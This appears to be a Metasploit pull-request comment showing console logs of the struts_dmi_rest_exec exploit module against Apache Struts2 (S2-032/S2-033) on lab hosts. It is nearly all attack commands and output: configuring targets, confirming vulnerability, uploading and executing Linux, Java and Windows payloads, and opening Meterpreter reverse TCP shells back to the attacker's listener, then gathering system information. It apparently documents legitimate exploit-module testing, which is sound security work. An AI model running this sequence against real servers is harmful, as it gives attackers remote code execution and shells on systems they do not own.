msf exploit(struts_dmi_rest_exec) > show options
Module options (exploit/multi/http/struts_dmi_rest_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 172.16.176.226 yes The target address
RPORT 8080 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-rest-showcase/orders/3 yes The path to a struts application action
TMPPATH no Overwrite the temp path for the file upload. Needed if the home directory is not writable.
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DebugOptions 0 no Debugging options for POSIX meterpreter
LHOST 172.16.176.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux Universal
msf exploit(struts_dmi_rest_exec) > check
[+] The target is vulnerable.
msf exploit(struts_dmi_rest_exec) > run
[*] Started reverse TCP handler on 172.16.176.1:4444
[*] 172.16.176.226:8080 - Uploading exploit to /tmp/8wN6, and executing it.
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.176.226
[*] Meterpreter session 2 opened (172.16.176.1:4444 -> 172.16.176.226:57188) at 2016-06-06 03:47:18 -0500
meterpreter > sysinfo
Computer : lab
OS : Linux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter >
Java Stager
msf exploit(struts_dmi_rest_exec) > show options
Module options (exploit/multi/http/struts_dmi_rest_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.0.246.72 yes The target address
RPORT 8080 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /struts2-rest-showcase/orders/32/ yes The path to a struts application action
TMPPATH no Overwrite the temp path for the file upload. Needed if the home directory is not writable.
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
2 Java Universal
msf exploit(struts_dmi_rest_exec) > check
[+] The target is vulnerable.
msf exploit(struts_dmi_rest_exec) > run
[*] Started reverse TCP handler on 10.0.250.22:4444
[*] 10.0.246.72:8080 - Uploading exploit to H4hsjp.jar, and executing it.
[*] Sending stage (46112 bytes) to 10.0.246.72
[*] Meterpreter session 1 opened (10.0.250.22:4444 -> 10.0.246.72:50002) at 2016-06-06 04:52:48 -0500
meterpreter > sysinfo
Computer : SECLAB
OS : Mac OS X 10.11.5 (x86_64)
Meterpreter : java/java
Windows Stager
msf exploit(struts_dmi_rest_exec) > exploit
[*] Started reverse TCP handler on 10.0.246.72:4444
[*] 10.0.246.170:8080 - Uploading exploit to .\cpSd.exe, and executing it.
[*] Sending stage (957999 bytes) to 10.0.246.170
[*] Meterpreter session 1 opened (10.0.246.72:4444 -> 10.0.246.170:49216) at 2016-06-06 18:20:37 +0800
meterpreter > sysinfo
sysinfo
Computer : seclab
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
nixawk
commented
8 years ago
https://struts.apache.org/docs/s2-033.html https://www.seebug.org/vuldb/ssvid-91741
I'll try a new pr against Apache Struts2 S2-033 which is similar to Apache Struts2 S2-032.
Linux Stager
Java Stager
Windows Stager